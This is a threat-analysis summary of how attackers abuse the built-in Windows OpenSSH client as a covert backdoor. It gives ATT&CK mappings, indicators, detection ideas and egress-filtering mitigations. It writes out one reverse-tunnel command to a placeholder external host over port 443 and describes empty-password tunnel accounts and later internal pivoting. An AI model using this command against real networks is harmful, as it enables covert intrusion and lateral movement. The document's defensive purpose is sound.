Full Report
Derek Banks // Living Off the Land Binaries, Scripts, and Libraries, known as LOLBins or LOLBAS, are legitimate components of an operating system that threat actors can use to achieve […] The post Ssh… Don’t Tell Them I Am Not HTTPS: How Attackers Use SSH.exe as a Backdoor Into Your Network appeared first on Black Hills Information Security, Inc..
Analysis Summary
# Tool/Technique: OpenSSH on Windows Server/Desktop
## Overview
The use of the legitimate, built-in OpenSSH client (`ssh.exe`) present on modern Windows operating systems (Server and Desktop OSes since Microsoft's 2018 decision) by threat actors to establish secure reverse tunnels (SOCKS proxies) for command and control or internal pivoting, often bypassing traditional security monitoring.
## Technical Details
- Type: Attack Tool (via Living Off the Land Binary - LOLBAS)
- Platform: Windows Server, Windows Desktop OS
- Capabilities: Establishing outbound, encrypted reverse SSH tunnels for port forwarding (SOCKS Proxy), running in the background, connecting over non-standard ports (e.g., TCP 443), and leveraging tunnel-only user accounts with empty passwords.
- First Seen: The integration of OpenSSH into Windows was formalized around 2018, but the specific malicious technique described here was identified during a recent incident response engagement.
## MITRE ATT&CK Mapping
*Note: The article explicitly states this specific technique does not currently appear to be mapped in MITRE ATT&CK, particularly the combination of flags and the empty password/tunnel-only user setup.*
Based on the functionality observed:
- T1090 - Proxy
- T1090.002 - External Proxy
- T1090.003 - Multi-hop Proxy
- T1573 - Encrypted Channel-Based Tunneling
- T1573.002 - Symmetric Cryptography
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (for executing the initial attack command or batch file)
## Functionality
### Core Capabilities
The primary function observed is establishing a hidden, encrypted reverse tunnel to an external host:
`ssh.exe sshtunnel@external_host -f -N -R 50000:victim_host:local_port -p 443 -o StrictHostKeyChecking=no`
1. **Reverse Tunneling (`-R`):** Forwarding a port on the remote (attacker-controlled) host back to a port on the victim network, effectively creating a SOCKS proxy accessible from the external machine via the tunneled port.
2. **Background Execution (`-f`):** Running the SSH command unobtrusively in the background.
3. **Non-Interactive Port Forwarding (`-N`):** Executing only the tunneling functionality without running a remote shell.
4. **Obfuscated Port Usage (`-p 443`):** Using TCP port 443 (typically reserved for HTTPS) to blend in with common outbound traffic.
5. **Bypassing Host Key Prompts (`-o StrictHostKeyChecking=no`):** Used to ensure automated execution without user interaction, likely facilitated by a persistent mechanism (like a scheduled task).
### Advanced Features
* **Tunnel-Only Authentication:** Utilizing a specific server-side configuration (`sshd_config`) combined with an empty password for a dedicated user (e.g., `sshtunnel`) which allows authentication to establish the tunnel but denies an interactive shell session.
* **Network Pivoting:** Once the tunnel is established, the attacker can pivot internally, for instance, using tools like Proxychains, Impacket, and Python Bloodhound against internal systems, leveraging compromised domain credentials.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: `ssh.exe` (used from expected system location or potentially hidden locations). Batch files stored in temp directories named similarly to valid Windows DLLs.
- Registry Keys: [Not provided in the context, though persistence relied on a Scheduled Task]
- Network Indicators: Outbound connections from Windows hosts utilizing raw SSH (port 22/non-standard port) to the internet. Specifically, connections over TCP 443 that use the SSH protocol stack.
- Behavioral Indicators:
* Execution of `ssh.exe` with flags `-f`, `-N`, and `-R`.
* Connections originating from Windows systems to external hosts on TCP 443 or other non-standard ports that utilize the SSH protocol fingerprint.
* The presence of brackets `[ ]` around hostnames in `known_hosts` files, indicating connections to non-FQDN hosts or IP addresses over non-standard ports.
## Associated Threat Actors
[Not explicitly named in the context, but the scenario implies a sophisticated actor capable of achieving Domain Credential compromise and setting up specific configurations on the attacker's C2 server.]
## Detection Methods
- Signature-based detection: Detecting known command-line arguments for `ssh.exe`, particularly the combination of `-f`, `-N`, and `-R`.
- Behavioral detection: Alerting on outbound network traffic using the SSH protocol stack over ports other than TCP 22, especially TCP 443.
- YARA rules: [Not provided in the context]
- **Threat Hunting:** Inspecting `known_hosts` files for hostnames enclosed in brackets (`[hostname]`), which signals connections to non-standard ports. Alerting on the use of the specific combination of SSH flags listed above across the environment.
## Mitigation Strategies
- Prevention measures:
* **Egress Filtering:** Implement Application Layer Firewall rules to enforce strict egress control. Configure the firewall so that only expected application traffic (e.g., HTTPS only on TCP 443) is allowed on corresponding ports.
* **Deny-by-Default:** Implement a general deny rule for all outbound TCP ports not explicitly required for business operations.
- Hardening recommendations:
* **Limit SSH Use:** If OpenSSH is not required on a system, ensure it is disabled or uninstalled.
* **Restrict Exceptions:** If legitimate SSH use is necessary (e.g., for administrators), limit exceptions strictly by user and source IP address.
* **Credential Security:** Assume domain compromise and focus on securing credentials to prevent the attacker from reaching the stage where they can set up persistence mechanisms.
## Related Tools/Techniques
- [Impacket](https://github.com/fortra/impacket) (Used post-tunneling for internal lateral movement)
- [Python Bloodhound](https://github.com/fox-it/BloodHound.py) (Used post-tunneling for internal mapping)
- Proxychains (Tool used to chain proxy connections)
- Other LOLBins leveraged for persistence (e.g., Scheduled Tasks)